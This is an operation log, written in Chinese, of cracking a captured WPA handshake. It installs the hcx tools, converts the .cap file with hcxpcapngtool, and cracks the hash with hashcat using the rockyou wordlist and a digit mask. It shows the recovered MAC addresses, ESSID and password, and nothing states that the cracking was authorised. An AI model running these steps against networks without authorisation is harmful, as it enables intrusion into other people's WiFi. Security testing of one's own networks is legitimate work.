关于利用hashcat破解WiFi数据包的操作记录
- 准备数据包相关转换工具
┌──(kali㉿kali)-[~/cap/3204]
└─$ sudo apt-cache search hc | grep ‘^hc’
hcloud-cli – command-line interface for Hetzner Cloud
hcxdumptool – Small tool to capture packets from wlan devices
hcxkeys – Tools to generate plainmasterkeys (rainbowtables)
hcxtools – Tools for converting captures to use with hashcat or John the Ripper
- 安装相关工具
┌──(kali㉿kali)-[~/cap/3204]
└─$ sudo apt install -y hcxdumptool hcxkeys hcxtools
其中,格式转换工具
──(kali㉿kali)-[~/cap/3204]
└─$ hcxpcapngtool –help
hcxpcapngtool 6.2.7 (C) 2022 ZeroBeat
convert pcapng, pcap and cap files to hash formats that hashcat and JtR use
usage:
hcxpcapngtool
hcxpcapngtool input.pcapng
hcxpcapngtool *.pcapng
hcxpcapngtool *.pcap
hcxpcapngtool *.cap
hcxpcapngtool *.*
short options:
-o : output WPA-PBKDF2-PMKID+EAPOL hash file (hashcat -m 22000)
get full advantage of reuse of PBKDF2 on PMKID and EAPOL
-E : output wordlist (autohex enabled on non ASCII characters) to use as input wordlist for cracker
retrieved from every frame that contain an ESSID
-R : output wordlist (autohex enabled on non ASCII characters) to use as input wordlist for cracker
retrieved from PROBEREQUEST frames only
-I : output unsorted identity list to use as input wordlist for cracker
-U : output unsorted username list to use as input wordlist for cracker
-D : output device information list
format MAC MANUFACTURER MODELNAME SERIALNUMBER DEVICENAME UUID
- 转换数据包格式为hashcat可以破解的格式
┌──(kali㉿kali)-[~/cap/3204]
└─$ hcxpcapngtool 64-09-80-76-D6-48_handshake.cap -o 64-09-80-76-D6-8_handshake.hccapx
hcxpcapngtool 6.2.7 reading from 64-09-80-76-D6-48_handshake.cap…
- 破解数据包
┌──(kali㉿kali)-[~/cap/3204]
└─$ zcat /usr/share/wordlists/rockyou.txt.gz | hashcat -a 0 -m 22000 64-09-80-76-D6-48_handshake.hccapx
查看结果:
┌──(kali㉿kali)-[~/cap/3204]
└─$ zcat /usr/share/wordlists/rockyou.txt.gz | hashcat -a 0 -m 22000 64-09-80-76-D6-48_handshake.hccapx –show
665dfcd30d67fa2792496adbadf92ec8:64098076d648:ce725514c434:3204:88888888
也可以用掩码进行破解
──(kali㉿kali)-[~/cap/3204]
└─$ hashcat -a 3 -m 22000 64-09-80-76-D6-48_handshake.hccapx ?d?d?d?d?d?d?d?d?d –force –show
665dfcd30d67fa2792496adbadf92ec8:64098076d648:ce725514c434:3204:88888888
